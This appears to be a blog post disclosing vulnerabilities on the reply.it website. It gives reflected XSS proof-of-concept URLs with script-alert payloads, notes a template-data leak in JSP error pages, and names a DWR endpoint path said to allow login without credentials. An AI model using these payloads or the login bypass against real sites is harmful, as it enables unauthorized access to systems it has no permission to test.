XSS
reply.it/it/search/?lang=IT&search=<script>alert(1);</script>
XSS
http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E
mirror (?) - same
http://d3v578iyw1eidm.cloudfront.net/
several problems in the jsp scripts (unmanaged null exceptions, data of the template, data, etc)
template(?) is visible by requesting a wrong id (?)
http://reply.it/it/practices/cloudcomputing/readd,7700-
sample of the output (ex. http://reply.it/it/practices/cloudcomputing/readd,7700- )
---------------
<div class="yui-gc clear" id="unacolonna"> <div class="yui-u first" id="col_2_3_sx"> <div class="tab"> ^service_link^ ^tag_contenuto^ ^dettaglio_contenuto^ </div>
</div> <div class="yui-gb"> ^box_jolly_cx_2^ ^box_jolly_cx_3^ ^box_jolly_cx_4^
---------------
It's possible to add data via POST and can be parsed as within the template.
(useless .. but could be used as a possible XSS attack)
---------------
bug in the getahead dwr library (ajax for java) ..... (old version?).
It's possible to login without logging.
(a simple request to this path)
http://www.reply.it/WPSReply2009/dwr/exec/RegistrationHandler.loginUser.dwr
Comments
Post a Comment